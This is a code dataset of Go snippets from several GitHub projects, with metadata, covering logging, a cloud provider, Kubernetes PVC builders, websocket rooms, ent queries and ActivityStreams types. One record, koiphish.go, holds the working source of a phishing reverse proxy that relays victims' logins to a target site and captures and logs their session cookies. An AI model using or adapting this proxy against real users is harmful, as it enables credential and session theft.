err = yaml.Unmarshal(confFileStream, conf)
if err != nil {
InitLogger(nil)
return perrors.Errorf("[Unmarshal]init logger error: %v", err)
}
InitLogger(conf)
return nil
}
func InitLogger(conf *zap.Config) {
var zapLoggerConfig zap.Config
if conf == nil {
zapLoggerEncoderConfig := zapcore.EncoderConfig{
TimeKey: "time",
LevelKey: "level",
NameKey: "logger",
CallerKey: "caller",
MessageKey: "message",
StacktraceKey: "stacktrace",
EncodeLevel: zapcore.CapitalColorLevelEncoder,
EncodeTime: zapcore.ISO8601TimeEncoder,
EncodeDuration: zapcore.SecondsDurationEncoder,
EncodeCaller: zapcore.ShortCallerEncoder,
}
zapLoggerConfig = zap.Config{
Level: zap.NewAtomicLevelAt(zap.DebugLevel),
Development: false,
Encoding: "console",
EncoderConfig: zapLoggerEncoderConfig,
OutputPaths: []string{"stderr"},
ErrorOutputPaths: []string{"stderr"},
}
} else {
zapLoggerConfig = *conf
}
zapLogger, _ := zapLoggerConfig.Build(zap.AddCallerSkip(1))
logger = &DubboLogger{Logger: zapLogger.Sugar(), dynamicLevel: zapLoggerConfig.Level}
getty.SetLogger(logger)
}
func SetLogger(log Logger) {
logger = log
getty.SetLogger(logger)
}
func GetLogger() Logger {
return logger
} | Apache License 2.0 |
yunify/qingcloud-cloud-controller-manager | pkg/qingcloud/qingcloud.go | GetLoadBalancerName | go | func (qc *QingCloud) GetLoadBalancerName(_ context.Context, _ string, service *v1.Service) string {
return ""
} | GetLoadBalancerName returns the name of the load balancer. Implementations must treat the
*v1.Service parameter as read-only and not modify it. | https://github.com/yunify/qingcloud-cloud-controller-manager/blob/eb4e273bed2e21918821fd23ef5b4b4c9724d52d/pkg/qingcloud/qingcloud.go#L139-L141 | package qingcloud
import (
"context"
"fmt"
"github.com/davecgh/go-spew/spew"
"github.com/yunify/qingcloud-cloud-controller-manager/pkg/apis"
"github.com/yunify/qingcloud-cloud-controller-manager/pkg/errors"
"github.com/yunify/qingcloud-cloud-controller-manager/pkg/executor"
yaml "gopkg.in/yaml.v2"
"io"
v1 "k8s.io/api/core/v1"
"k8s.io/client-go/informers"
corev1informer "k8s.io/client-go/informers/core/v1"
corev1 "k8s.io/client-go/kubernetes/typed/core/v1"
cloudprovider "k8s.io/cloud-provider"
"k8s.io/klog"
)
const (
ProviderName = "qingcloud"
QYConfigPath = "/etc/qingcloud/config.yaml"
)
type Config struct {
Zone string `yaml:"zone"`
DefaultVxNetForLB string `yaml:"defaultVxNetForLB,omitempty"`
ClusterID string `yaml:"clusterID"`
IsApp bool `yaml:"isApp,omitempty"`
TagIDs []string `yaml:"tagIDs,omitempty"`
InstanceIDs []string `yaml:"instanceIDs,omitempty"`
}
type QingCloud struct {
Config *Config
Client executor.QingCloudClientInterface
nodeInformer corev1informer.NodeInformer
serviceInformer corev1informer.ServiceInformer
corev1interface corev1.CoreV1Interface
}
func init() {
cloudprovider.RegisterCloudProvider(ProviderName, func(config io.Reader) (cloudprovider.Interface, error) {
return NewQingCloud(config)
})
}
func NewQingCloud(cfg io.Reader) (cloudprovider.Interface, error) {
if cfg == nil {
return nil, fmt.Errorf("no qingcloud provider Config file given")
}
var (
config Config
)
err := yaml.NewDecoder(cfg).Decode(&config)
if err != nil {
return nil, fmt.Errorf("failed to decode Config file, err=%v", err)
}
client, err := executor.NewQingCloudClient(&executor.ClientConfig{
IsAPP: config.IsApp,
TagIDs: config.TagIDs,
}, QYConfigPath)
if err != nil {
return nil, err
}
qc := QingCloud{
Config: &config,
Client: client,
}
return &qc, nil
}
func (qc *QingCloud) Initialize(clientBuilder cloudprovider.ControllerClientBuilder, stop <-chan struct{}) {
clientset := clientBuilder.ClientOrDie("do-shared-informers")
sharedInformer := informers.NewSharedInformerFactory(clientset, 0)
nodeinformer := sharedInformer.Core().V1().Nodes()
go nodeinformer.Informer().Run(stop)
qc.nodeInformer = nodeinformer
serviceInformer := sharedInformer.Core().V1().Services()
go serviceInformer.Informer().Run(stop)
qc.serviceInformer = serviceInformer
qc.corev1interface = clientset.CoreV1()
}
func (qc *QingCloud) Clusters() (cloudprovider.Clusters, bool) {
return nil, false
}
func (qc *QingCloud) Routes() (cloudprovider.Routes, bool) {
return nil, false
}
func (qc *QingCloud) ProviderName() string {
return ProviderName
}
func (qc *QingCloud) Instances() (cloudprovider.Instances, bool) {
return nil, false
}
func (qc *QingCloud) InstancesV2() (cloudprovider.InstancesV2, bool) {
return nil, false
}
func (qc *QingCloud) Zones() (cloudprovider.Zones, bool) {
return nil, false
}
func (qc *QingCloud) HasClusterID() bool {
return qc.Config.ClusterID != ""
}
func (qc *QingCloud) LoadBalancer() (cloudprovider.LoadBalancer, bool) {
return qc, true
} | Apache License 2.0 |
openebs/dynamic-nfs-provisioner | pkg/kubernetes/api/core/v1/persistentvolumeclaim/buildlist.go | ListBuilderForObjects | go | func ListBuilderForObjects(pvcs *PVCList) *ListBuilder {
b := &ListBuilder{}
if pvcs == nil {
b.errs = append(
b.errs,
errors.New("failed to build pvc list: missing object list"),
)
return b
}
b.list = pvcs
return b
} | ListBuilderForObjects returns a new instance of
ListBuilder based on provided pvc list | https://github.com/openebs/dynamic-nfs-provisioner/blob/b410fa595e561c38d433291ada1d9709177d6b53/pkg/kubernetes/api/core/v1/persistentvolumeclaim/buildlist.go#L85-L97 | package persistentvolumeclaim
import (
errors "github.com/pkg/errors"
corev1 "k8s.io/api/core/v1"
)
type ListBuilder struct {
template *corev1.PersistentVolumeClaim
count int
list *PVCList
filters PredicateList
errs []error
}
func NewListBuilder() *ListBuilder {
return &ListBuilder{list: &PVCList{}}
}
func ListBuilderFromTemplate(pvc *corev1.PersistentVolumeClaim) *ListBuilder {
b := NewListBuilder()
if pvc == nil {
b.errs = append(
b.errs,
errors.New("failed to build pvc list: nil pvc template"),
)
return b
}
b.template = pvc
b.count = 1
return b
}
func ListBuilderForAPIObjects(pvcs *corev1.PersistentVolumeClaimList) *ListBuilder {
b := &ListBuilder{list: &PVCList{}}
if pvcs == nil {
b.errs = append(
b.errs,
errors.New("failed to build pvc list: missing api list"),
)
return b
}
for _, pvc := range pvcs.Items {
pvc := pvc
b.list.items = append(b.list.items, &PVC{object: &pvc})
}
return b
} | Apache License 2.0 |
godwhoa/wsrooms | room.go | BroadcastAll | go | func (r *Room) BroadcastAll(msg []byte) {
for _, client := range r.clients {
client.WriteMessage(msg)
}
} | /* Broadcast to every client | https://github.com/godwhoa/wsrooms/blob/b928e4438a10d038b7eef219ec6cd840b7659fb5/room.go#L38-L42 | package main
import (
"log"
"github.com/gorilla/websocket"
)
type Room struct {
name string
clients map[int]*Client
count int
index int
}
func (r *Room) Join(conn *websocket.Conn) int {
r.index++
r.clients[r.index] = NewClient(conn)
log.Printf("New Client joined %s", r.name)
r.count++
return r.index
}
func (r *Room) Leave(id int) {
r.count--
delete(r.clients, id)
}
func (r *Room) SendTo(id int, msg []byte) {
r.clients[id].WriteMessage(msg)
} | MIT License |
ent/contrib | entproto/internal/entprototest/ent/user_query.go | StringsX | go | func (ugb *UserGroupBy) StringsX(ctx context.Context) []string {
v, err := ugb.Strings(ctx)
if err != nil {
panic(err)
}
return v
} | StringsX is like Strings, but panics if an error occurs. | https://github.com/ent/contrib/blob/2f98d3a15e7dfcc96aa696a5aceb0c8b1249f9e4/entproto/internal/entprototest/ent/user_query.go#L621-L627 | package ent
import (
"context"
"database/sql/driver"
"errors"
"fmt"
"math"
"entgo.io/contrib/entproto/internal/entprototest/ent/blogpost"
"entgo.io/contrib/entproto/internal/entprototest/ent/image"
"entgo.io/contrib/entproto/internal/entprototest/ent/predicate"
"entgo.io/contrib/entproto/internal/entprototest/ent/user"
"entgo.io/ent/dialect/sql"
"entgo.io/ent/dialect/sql/sqlgraph"
"entgo.io/ent/schema/field"
"github.com/google/uuid"
)
type UserQuery struct {
config
limit *int
offset *int
unique *bool
order []OrderFunc
fields []string
predicates []predicate.User
withBlogPosts *BlogPostQuery
withProfilePic *ImageQuery
withFKs bool
sql *sql.Selector
path func(context.Context) (*sql.Selector, error)
}
func (uq *UserQuery) Where(ps ...predicate.User) *UserQuery {
uq.predicates = append(uq.predicates, ps...)
return uq
}
func (uq *UserQuery) Limit(limit int) *UserQuery {
uq.limit = &limit
return uq
}
func (uq *UserQuery) Offset(offset int) *UserQuery {
uq.offset = &offset
return uq
}
func (uq *UserQuery) Unique(unique bool) *UserQuery {
uq.unique = &unique
return uq
}
func (uq *UserQuery) Order(o ...OrderFunc) *UserQuery {
uq.order = append(uq.order, o...)
return uq
}
func (uq *UserQuery) QueryBlogPosts() *BlogPostQuery {
query := &BlogPostQuery{config: uq.config}
query.path = func(ctx context.Context) (fromU *sql.Selector, err error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
selector := uq.sqlQuery(ctx)
if err := selector.Err(); err != nil {
return nil, err
}
step := sqlgraph.NewStep(
sqlgraph.From(user.Table, user.FieldID, selector),
sqlgraph.To(blogpost.Table, blogpost.FieldID),
sqlgraph.Edge(sqlgraph.O2M, true, user.BlogPostsTable, user.BlogPostsColumn),
)
fromU = sqlgraph.SetNeighbors(uq.driver.Dialect(), step)
return fromU, nil
}
return query
}
func (uq *UserQuery) QueryProfilePic() *ImageQuery {
query := &ImageQuery{config: uq.config}
query.path = func(ctx context.Context) (fromU *sql.Selector, err error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
selector := uq.sqlQuery(ctx)
if err := selector.Err(); err != nil {
return nil, err
}
step := sqlgraph.NewStep(
sqlgraph.From(user.Table, user.FieldID, selector),
sqlgraph.To(image.Table, image.FieldID),
sqlgraph.Edge(sqlgraph.M2O, false, user.ProfilePicTable, user.ProfilePicColumn),
)
fromU = sqlgraph.SetNeighbors(uq.driver.Dialect(), step)
return fromU, nil
}
return query
}
func (uq *UserQuery) First(ctx context.Context) (*User, error) {
nodes, err := uq.Limit(1).All(ctx)
if err != nil {
return nil, err
}
if len(nodes) == 0 {
return nil, &NotFoundError{user.Label}
}
return nodes[0], nil
}
func (uq *UserQuery) FirstX(ctx context.Context) *User {
node, err := uq.First(ctx)
if err != nil && !IsNotFound(err) {
panic(err)
}
return node
}
func (uq *UserQuery) FirstID(ctx context.Context) (id int, err error) {
var ids []int
if ids, err = uq.Limit(1).IDs(ctx); err != nil {
return
}
if len(ids) == 0 {
err = &NotFoundError{user.Label}
return
}
return ids[0], nil
}
func (uq *UserQuery) FirstIDX(ctx context.Context) int {
id, err := uq.FirstID(ctx)
if err != nil && !IsNotFound(err) {
panic(err)
}
return id
}
func (uq *UserQuery) Only(ctx context.Context) (*User, error) {
nodes, err := uq.Limit(2).All(ctx)
if err != nil {
return nil, err
}
switch len(nodes) {
case 1:
return nodes[0], nil
case 0:
return nil, &NotFoundError{user.Label}
default:
return nil, &NotSingularError{user.Label}
}
}
func (uq *UserQuery) OnlyX(ctx context.Context) *User {
node, err := uq.Only(ctx)
if err != nil {
panic(err)
}
return node
}
func (uq *UserQuery) OnlyID(ctx context.Context) (id int, err error) {
var ids []int
if ids, err = uq.Limit(2).IDs(ctx); err != nil {
return
}
switch len(ids) {
case 1:
id = ids[0]
case 0:
err = &NotFoundError{user.Label}
default:
err = &NotSingularError{user.Label}
}
return
}
func (uq *UserQuery) OnlyIDX(ctx context.Context) int {
id, err := uq.OnlyID(ctx)
if err != nil {
panic(err)
}
return id
}
func (uq *UserQuery) All(ctx context.Context) ([]*User, error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
return uq.sqlAll(ctx)
}
func (uq *UserQuery) AllX(ctx context.Context) []*User {
nodes, err := uq.All(ctx)
if err != nil {
panic(err)
}
return nodes
}
func (uq *UserQuery) IDs(ctx context.Context) ([]int, error) {
var ids []int
if err := uq.Select(user.FieldID).Scan(ctx, &ids); err != nil {
return nil, err
}
return ids, nil
}
func (uq *UserQuery) IDsX(ctx context.Context) []int {
ids, err := uq.IDs(ctx)
if err != nil {
panic(err)
}
return ids
}
func (uq *UserQuery) Count(ctx context.Context) (int, error) {
if err := uq.prepareQuery(ctx); err != nil {
return 0, err
}
return uq.sqlCount(ctx)
}
func (uq *UserQuery) CountX(ctx context.Context) int {
count, err := uq.Count(ctx)
if err != nil {
panic(err)
}
return count
}
func (uq *UserQuery) Exist(ctx context.Context) (bool, error) {
if err := uq.prepareQuery(ctx); err != nil {
return false, err
}
return uq.sqlExist(ctx)
}
func (uq *UserQuery) ExistX(ctx context.Context) bool {
exist, err := uq.Exist(ctx)
if err != nil {
panic(err)
}
return exist
}
func (uq *UserQuery) Clone() *UserQuery {
if uq == nil {
return nil
}
return &UserQuery{
config: uq.config,
limit: uq.limit,
offset: uq.offset,
order: append([]OrderFunc{}, uq.order...),
predicates: append([]predicate.User{}, uq.predicates...),
withBlogPosts: uq.withBlogPosts.Clone(),
withProfilePic: uq.withProfilePic.Clone(),
sql: uq.sql.Clone(),
path: uq.path,
}
}
func (uq *UserQuery) WithBlogPosts(opts ...func(*BlogPostQuery)) *UserQuery {
query := &BlogPostQuery{config: uq.config}
for _, opt := range opts {
opt(query)
}
uq.withBlogPosts = query
return uq
}
func (uq *UserQuery) WithProfilePic(opts ...func(*ImageQuery)) *UserQuery {
query := &ImageQuery{config: uq.config}
for _, opt := range opts {
opt(query)
}
uq.withProfilePic = query
return uq
}
func (uq *UserQuery) GroupBy(field string, fields ...string) *UserGroupBy {
group := &UserGroupBy{config: uq.config}
group.fields = append([]string{field}, fields...)
group.path = func(ctx context.Context) (prev *sql.Selector, err error) {
if err := uq.prepareQuery(ctx); err != nil {
return nil, err
}
return uq.sqlQuery(ctx), nil
}
return group
}
func (uq *UserQuery) Select(fields ...string) *UserSelect {
uq.fields = append(uq.fields, fields...)
return &UserSelect{UserQuery: uq}
}
func (uq *UserQuery) prepareQuery(ctx context.Context) error {
for _, f := range uq.fields {
if !user.ValidColumn(f) {
return &ValidationError{Name: f, err: fmt.Errorf("ent: invalid field %q for query", f)}
}
}
if uq.path != nil {
prev, err := uq.path(ctx)
if err != nil {
return err
}
uq.sql = prev
}
return nil
}
func (uq *UserQuery) sqlAll(ctx context.Context) ([]*User, error) {
var (
nodes = []*User{}
withFKs = uq.withFKs
_spec = uq.querySpec()
loadedTypes = [2]bool{
uq.withBlogPosts != nil,
uq.withProfilePic != nil,
}
)
if uq.withProfilePic != nil {
withFKs = true
}
if withFKs {
_spec.Node.Columns = append(_spec.Node.Columns, user.ForeignKeys...)
}
_spec.ScanValues = func(columns []string) ([]interface{}, error) {
node := &User{config: uq.config}
nodes = append(nodes, node)
return node.scanValues(columns)
}
_spec.Assign = func(columns []string, values []interface{}) error {
if len(nodes) == 0 {
return fmt.Errorf("ent: Assign called without calling ScanValues")
}
node := nodes[len(nodes)-1]
node.Edges.loadedTypes = loadedTypes
return node.assignValues(columns, values)
}
if err := sqlgraph.QueryNodes(ctx, uq.driver, _spec); err != nil {
return nil, err
}
if len(nodes) == 0 {
return nodes, nil
}
if query := uq.withBlogPosts; query != nil {
fks := make([]driver.Value, 0, len(nodes))
nodeids := make(map[int]*User)
for i := range nodes {
fks = append(fks, nodes[i].ID)
nodeids[nodes[i].ID] = nodes[i]
nodes[i].Edges.BlogPosts = []*BlogPost{}
}
query.withFKs = true
query.Where(predicate.BlogPost(func(s *sql.Selector) {
s.Where(sql.InValues(user.BlogPostsColumn, fks...))
}))
neighbors, err := query.All(ctx)
if err != nil {
return nil, err
}
for _, n := range neighbors {
fk := n.blog_post_author
if fk == nil {
return nil, fmt.Errorf(`foreign-key "blog_post_author" is nil for node %v`, n.ID)
}
node, ok := nodeids[*fk]
if !ok {
return nil, fmt.Errorf(`unexpected foreign-key "blog_post_author" returned %v for node %v`, *fk, n.ID)
}
node.Edges.BlogPosts = append(node.Edges.BlogPosts, n)
}
}
if query := uq.withProfilePic; query != nil {
ids := make([]uuid.UUID, 0, len(nodes))
nodeids := make(map[uuid.UUID][]*User)
for i := range nodes {
if nodes[i].user_profile_pic == nil {
continue
}
fk := *nodes[i].user_profile_pic
if _, ok := nodeids[fk]; !ok {
ids = append(ids, fk)
}
nodeids[fk] = append(nodeids[fk], nodes[i])
}
query.Where(image.IDIn(ids...))
neighbors, err := query.All(ctx)
if err != nil {
return nil, err
}
for _, n := range neighbors {
nodes, ok := nodeids[n.ID]
if !ok {
return nil, fmt.Errorf(`unexpected foreign-key "user_profile_pic" returned %v`, n.ID)
}
for i := range nodes {
nodes[i].Edges.ProfilePic = n
}
}
}
return nodes, nil
}
func (uq *UserQuery) sqlCount(ctx context.Context) (int, error) {
_spec := uq.querySpec()
return sqlgraph.CountNodes(ctx, uq.driver, _spec)
}
func (uq *UserQuery) sqlExist(ctx context.Context) (bool, error) {
n, err := uq.sqlCount(ctx)
if err != nil {
return false, fmt.Errorf("ent: check existence: %w", err)
}
return n > 0, nil
}
func (uq *UserQuery) querySpec() *sqlgraph.QuerySpec {
_spec := &sqlgraph.QuerySpec{
Node: &sqlgraph.NodeSpec{
Table: user.Table,
Columns: user.Columns,
ID: &sqlgraph.FieldSpec{
Type: field.TypeInt,
Column: user.FieldID,
},
},
From: uq.sql,
Unique: true,
}
if unique := uq.unique; unique != nil {
_spec.Unique = *unique
}
if fields := uq.fields; len(fields) > 0 {
_spec.Node.Columns = make([]string, 0, len(fields))
_spec.Node.Columns = append(_spec.Node.Columns, user.FieldID)
for i := range fields {
if fields[i] != user.FieldID {
_spec.Node.Columns = append(_spec.Node.Columns, fields[i])
}
}
}
if ps := uq.predicates; len(ps) > 0 {
_spec.Predicate = func(selector *sql.Selector) {
for i := range ps {
ps[i](selector)
}
}
}
if limit := uq.limit; limit != nil {
_spec.Limit = *limit
}
if offset := uq.offset; offset != nil {
_spec.Offset = *offset
}
if ps := uq.order; len(ps) > 0 {
_spec.Order = func(selector *sql.Selector) {
for i := range ps {
ps[i](selector)
}
}
}
return _spec
}
func (uq *UserQuery) sqlQuery(ctx context.Context) *sql.Selector {
builder := sql.Dialect(uq.driver.Dialect())
t1 := builder.Table(user.Table)
columns := uq.fields
if len(columns) == 0 {
columns = user.Columns
}
selector := builder.Select(t1.Columns(columns...)...).From(t1)
if uq.sql != nil {
selector = uq.sql
selector.Select(selector.Columns(columns...)...)
}
for _, p := range uq.predicates {
p(selector)
}
for _, p := range uq.order {
p(selector)
}
if offset := uq.offset; offset != nil {
selector.Offset(*offset).Limit(math.MaxInt32)
}
if limit := uq.limit; limit != nil {
selector.Limit(*limit)
}
return selector
}
type UserGroupBy struct {
config
fields []string
fns []AggregateFunc
sql *sql.Selector
path func(context.Context) (*sql.Selector, error)
}
func (ugb *UserGroupBy) Aggregate(fns ...AggregateFunc) *UserGroupBy {
ugb.fns = append(ugb.fns, fns...)
return ugb
}
func (ugb *UserGroupBy) Scan(ctx context.Context, v interface{}) error {
query, err := ugb.path(ctx)
if err != nil {
return err
}
ugb.sql = query
return ugb.sqlScan(ctx, v)
}
func (ugb *UserGroupBy) ScanX(ctx context.Context, v interface{}) {
if err := ugb.Scan(ctx, v); err != nil {
panic(err)
}
}
func (ugb *UserGroupBy) Strings(ctx context.Context) ([]string, error) {
if len(ugb.fields) > 1 {
return nil, errors.New("ent: UserGroupBy.Strings is not achievable when grouping more than 1 field")
}
var v []string
if err := ugb.Scan(ctx, &v); err != nil {
return nil, err
}
return v, nil
} | Apache License 2.0 |
wunderwuzzi23/koiphish | koiphish.go | blackholeRequest | go | func blackholeRequest(w http.ResponseWriter, r *http.Request) {
http.Error(w, "Not applicable.", http.StatusBadRequest)
return
} | /////////////////////////////////////////////////////////////////////////////
/ Handler to ignore requests
///////////////////////////////////////////////////////////////////////////// | https://github.com/wunderwuzzi23/koiphish/blob/0772037b647f68dafe9db2794b9a1b0d4189f39f/koiphish.go#L279-L282 | package main
import (
"bytes"
"compress/gzip"
"fmt"
"io/ioutil"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os"
"strings"
"time"
)
const _target string = "<put_target_server>"
const _sourceHost string = "localhost"
const _successRoute = "/CheckCookie"
var _cookiesToLookFor = map[string]string{}
var _requestsToDump = []string{"_/signin/sl/challenge", "_/signin/sl/lookup"}
var _requestsToIgnore = []string{"/_/common/diagnostics", "/cspreport", "/jserror", "/info"}
var _addtionalCustomBodyRewrites = []string{}
var _targetURL *url.URL
var _targetDomain string
var _logfile *os.File
func initialize() {
starttime := time.Now()
os.Mkdir("logs", 0644)
filename := "./logs/koiphish." + starttime.Format("2006-01-02_150405") + ".log"
_logfile, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
log.Println(err)
}
log.SetOutput(_logfile)
_targetURL, err = url.Parse(_target)
if err != nil {
panic(err)
}
_targetDomain = _targetURL.Scheme + "://" + _targetURL.Host
log.Println("KoiPhish started.")
log.Println("Target: " + _targetDomain)
log.Println("Logfile: " + filename)
}
func checkForCookies(response *http.Response, content string) string {
cookies := ""
for i := 0; i < len(response.Cookies()); i++ {
currentCookie := response.Cookies()[i]
for name, domain := range _cookiesToLookFor {
if currentCookie.Name == name {
setcookie := "document.cookie=\"" + currentCookie.Name + "=" + currentCookie.Value + ";Domain=" + domain + "\""
cookies += setcookie + "\n"
log.Println(setcookie)
}
}
}
return cookies
}
func rewriteHeaders(request *http.Request, sourceRequest *http.Request) {
for key, value := range sourceRequest.Header {
neworig := strings.Replace(value[0], _sourceHost, _targetURL.Host, -1)
request.Header.Set(key, neworig)
}
request.Header.Set("Host", _targetURL.Host)
request.Header.Set("User-Agent", sourceRequest.UserAgent())
}
func main() {
initialize()
fmt.Println("KoiPhish started.")
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
log.Println("Request " + r.RequestURI + " received from " + r.RemoteAddr)
dumpRequest(r)
updatedRequestURL := strings.Replace(r.RequestURI, _sourceHost, _targetURL.Host, -1)
destinationURL := _targetDomain + updatedRequestURL
request, _ := http.NewRequest(r.Method, destinationURL, r.Body)
if r.Method == "POST" {
postBody, err := ioutil.ReadAll(r.Body)
if err != nil {
log.Printf("Error reading post body: %v", err)
http.Error(w, "", http.StatusBadRequest)
return
}
analyzeBody(r, string(postBody))
postBodyString := strings.Replace(string(postBody), _sourceHost, _targetURL.Host, -1)
requestBody := bytes.NewReader([]byte(postBodyString))
request, err = http.NewRequest(r.Method,
destinationURL,
requestBody)
}
request.Header = r.Header
rewriteHeaders(request, r)
resp, err := http.DefaultClient.Do(request)
if err != nil {
log.Printf("Error issueing request: %v", err)
http.Error(w, "", http.StatusBadRequest)
return
}
defer resp.Body.Close()
dumpResponse(resp)
content, err := ioutil.ReadAll(resp.Body)
if err != nil {
log.Printf("Error reading uncompressed body: %v", err)
http.Error(w, "", http.StatusBadRequest)
return
}
if resp.Header.Get("Content-Encoding") == "gzip" {
content = decompress(content)
}
cookies := checkForCookies(resp, string(content))
if cookies != "" {
fmt.Println(cookies)
}
content = []byte(updateBody(string(content), _targetDomain))
if resp.Header.Get("Content-Encoding") == "gzip" {
content = compress(content)
}
for key, value := range resp.Header {
if key == "Content-Length" {
w.Header().Add(key, string(len(content)))
continue
}
for _, valueToSet := range value {
temp := strings.Split(_targetURL.Host, ".")
topLevel := "." + temp[len(temp)-2] + "." + temp[len(temp)-1]
if key == "Set-Cookie" {
valueToSet = strings.Replace(valueToSet, ";Domain="+topLevel, "", -1)
}
w.Header().Add(key, valueToSet)
}
}
w.Write(content)
})
http.HandleFunc(_successRoute, func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, _target, 302)
})
for i := 0; i < len(_requestsToIgnore); i++ {
http.HandleFunc(_requestsToIgnore[i], blackholeRequest)
}
http.ListenAndServeTLS(":443", "server.crt", "server.key", nil)
} | MIT License |
go-fed/activity | streams/impl/activitystreams/type_activity/gen_type_activitystreams_activity.go | GetActivityStreamsMediaType | go | func (this ActivityStreamsActivity) GetActivityStreamsMediaType() vocab.ActivityStreamsMediaTypeProperty {
return this.ActivityStreamsMediaType
} | GetActivityStreamsMediaType returns the "mediaType" property if it exists, and
nil otherwise. | https://github.com/go-fed/activity/blob/d866ba75dd0ff3ddd3a72b132b7cc16e01f6e006/streams/impl/activitystreams/type_activity/gen_type_activitystreams_activity.go#L592-L594 | package typeactivity
import (
"fmt"
vocab "github.com/go-fed/activity/streams/vocab"
"strings"
)
type ActivityStreamsActivity struct {
ActivityStreamsActor vocab.ActivityStreamsActorProperty
ActivityStreamsAltitude vocab.ActivityStreamsAltitudeProperty
ActivityStreamsAttachment vocab.ActivityStreamsAttachmentProperty
ActivityStreamsAttributedTo vocab.ActivityStreamsAttributedToProperty
ActivityStreamsAudience vocab.ActivityStreamsAudienceProperty
ActivityStreamsBcc vocab.ActivityStreamsBccProperty
ActivityStreamsBto vocab.ActivityStreamsBtoProperty
ActivityStreamsCc vocab.ActivityStreamsCcProperty
ActivityStreamsContent vocab.ActivityStreamsContentProperty
ActivityStreamsContext vocab.ActivityStreamsContextProperty
ActivityStreamsDuration vocab.ActivityStreamsDurationProperty
ActivityStreamsEndTime vocab.ActivityStreamsEndTimeProperty
ActivityStreamsGenerator vocab.ActivityStreamsGeneratorProperty
ActivityStreamsIcon vocab.ActivityStreamsIconProperty
JSONLDId vocab.JSONLDIdProperty
ActivityStreamsImage vocab.ActivityStreamsImageProperty
ActivityStreamsInReplyTo vocab.ActivityStreamsInReplyToProperty
ActivityStreamsInstrument vocab.ActivityStreamsInstrumentProperty
ActivityStreamsLikes vocab.ActivityStreamsLikesProperty
ActivityStreamsLocation vocab.ActivityStreamsLocationProperty
ActivityStreamsMediaType vocab.ActivityStreamsMediaTypeProperty
ActivityStreamsName vocab.ActivityStreamsNameProperty
ActivityStreamsObject vocab.ActivityStreamsObjectProperty
ActivityStreamsOrigin vocab.ActivityStreamsOriginProperty
ActivityStreamsPreview vocab.ActivityStreamsPreviewProperty
ActivityStreamsPublished vocab.ActivityStreamsPublishedProperty
ActivityStreamsReplies vocab.ActivityStreamsRepliesProperty
ActivityStreamsResult vocab.ActivityStreamsResultProperty
ActivityStreamsShares vocab.ActivityStreamsSharesProperty
ActivityStreamsSource vocab.ActivityStreamsSourceProperty
ActivityStreamsStartTime vocab.ActivityStreamsStartTimeProperty
ActivityStreamsSummary vocab.ActivityStreamsSummaryProperty
ActivityStreamsTag vocab.ActivityStreamsTagProperty
ActivityStreamsTarget vocab.ActivityStreamsTargetProperty
ForgeFedTeam vocab.ForgeFedTeamProperty
ForgeFedTicketsTrackedBy vocab.ForgeFedTicketsTrackedByProperty
ActivityStreamsTo vocab.ActivityStreamsToProperty
ForgeFedTracksTicketsFor vocab.ForgeFedTracksTicketsForProperty
JSONLDType vocab.JSONLDTypeProperty
ActivityStreamsUpdated vocab.ActivityStreamsUpdatedProperty
ActivityStreamsUrl vocab.ActivityStreamsUrlProperty
alias string
unknown map[string]interface{}
}
func ActivityIsDisjointWith(other vocab.Type) bool {
disjointWith := []string{"Link", "Mention"}
for _, disjoint := range disjointWith {
if disjoint == other.GetTypeName() {
return true
}
}
return false
}
func ActivityIsExtendedBy(other vocab.Type) bool {
extensions := []string{"Accept", "Add", "Announce", "Arrive", "Block", "Create", "Delete", "Dislike", "Flag", "Follow", "Ignore", "IntransitiveActivity", "Invite", "Join", "Leave", "Like", "Listen", "Move", "Offer", "Push", "Question", "Read", "Reject", "Remove", "TentativeAccept", "TentativeReject", "Travel", "Undo", "Update", "View"}
for _, ext := range extensions {
if ext == other.GetTypeName() {
return true
}
}
return false
}
func ActivityStreamsActivityExtends(other vocab.Type) bool {
extensions := []string{"Object"}
for _, ext := range extensions {
if ext == other.GetTypeName() {
return true
}
}
return false
}
func DeserializeActivity(m map[string]interface{}, aliasMap map[string]string) (*ActivityStreamsActivity, error) {
alias := ""
aliasPrefix := ""
if a, ok := aliasMap["https://www.w3.org/ns/activitystreams"]; ok {
alias = a
aliasPrefix = a + ":"
}
this := &ActivityStreamsActivity{
alias: alias,
unknown: make(map[string]interface{}),
}
if typeValue, ok := m["type"]; !ok {
return nil, fmt.Errorf("no \"type\" property in map")
} else if typeString, ok := typeValue.(string); ok {
typeName := strings.TrimPrefix(typeString, aliasPrefix)
if typeName != "Activity" {
return nil, fmt.Errorf("\"type\" property is not of %q type: %s", "Activity", typeName)
}
} else if arrType, ok := typeValue.([]interface{}); ok {
found := false
for _, elemVal := range arrType {
if typeString, ok := elemVal.(string); ok && strings.TrimPrefix(typeString, aliasPrefix) == "Activity" {
found = true
break
}
}
if !found {
return nil, fmt.Errorf("could not find a \"type\" property of value %q", "Activity")
}
} else {
return nil, fmt.Errorf("\"type\" property is unrecognized type: %T", typeValue)
}
if p, err := mgr.DeserializeActorPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsActor = p
}
if p, err := mgr.DeserializeAltitudePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAltitude = p
}
if p, err := mgr.DeserializeAttachmentPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAttachment = p
}
if p, err := mgr.DeserializeAttributedToPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAttributedTo = p
}
if p, err := mgr.DeserializeAudiencePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsAudience = p
}
if p, err := mgr.DeserializeBccPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsBcc = p
}
if p, err := mgr.DeserializeBtoPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsBto = p
}
if p, err := mgr.DeserializeCcPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsCc = p
}
